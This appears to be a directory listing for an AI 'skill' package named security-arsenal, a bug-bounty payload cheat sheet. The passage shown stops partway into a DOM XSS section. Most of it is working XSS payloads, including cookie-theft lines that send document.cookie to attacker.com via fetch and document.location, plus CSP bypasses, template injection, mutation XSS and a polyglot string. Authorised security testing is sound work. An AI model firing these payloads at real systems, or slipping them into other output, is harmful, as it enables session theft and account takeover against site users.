← ClaudeAtlas

security-arsenallisted

Security payloads, bypass tables, wordlists, gf pattern names, always-rejected bug list, and conditionally-valid-with-chain table. Use when you need specific payloads for XSS/SSRF/SQLi/XXE/NoSQLi/command injection/SSTI/IDOR/path-traversal/HTTP smuggling/WebSocket/MFA bypass, bypass techniques, or to check if a finding is submittable. Also use when asked about what NOT to submit.
elementalsouls/Claude-BugHunter · ★ 1,240 · AI & Automation · score 82
Install: claude install-skill elementalsouls/Claude-BugHunter
# SECURITY ARSENAL Payloads, bypass tables, wordlists, and submission rules. --- ## XSS PAYLOADS ### Basic Probes ```javascript <script>alert(document.domain)</script> <img src=x onerror=alert(document.domain)> <svg onload=alert(document.domain)> "><script>alert(1)</script> '><img src=x onerror=alert(1)> javascript:alert(document.domain) ``` ### Cookie Theft (proof of impact) ```javascript <script>document.location='https://attacker.com/c?c='+document.cookie</script> <img src=x onerror="fetch('https://attacker.com?c='+document.cookie)"> <script>fetch('https://attacker.com?c='+btoa(document.cookie))</script> ``` ### CSP Bypass Techniques ```javascript // If unsafe-inline blocked — use fetch/XHR <img src=x onerror="fetch('https://attacker.com?d='+btoa(document.cookie))"> // If script-src nonce present — find nonce reflection <script nonce="NONCE_FROM_PAGE">alert(1)</script> // Angular template injection (bypasses many CSPs) {{constructor.constructor('alert(1)')()}} // React dangerouslySetInnerHTML reflection // Vue v-html binding // mXSS (mutation-based XSS) <noscript><p title="</noscript><img src=x onerror=alert(1)>"> // Polyglot (works in HTML/JS/CSS context) '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script> ``` ### DOM XSS Sources and Sinks ```javascript // Sources (user-contro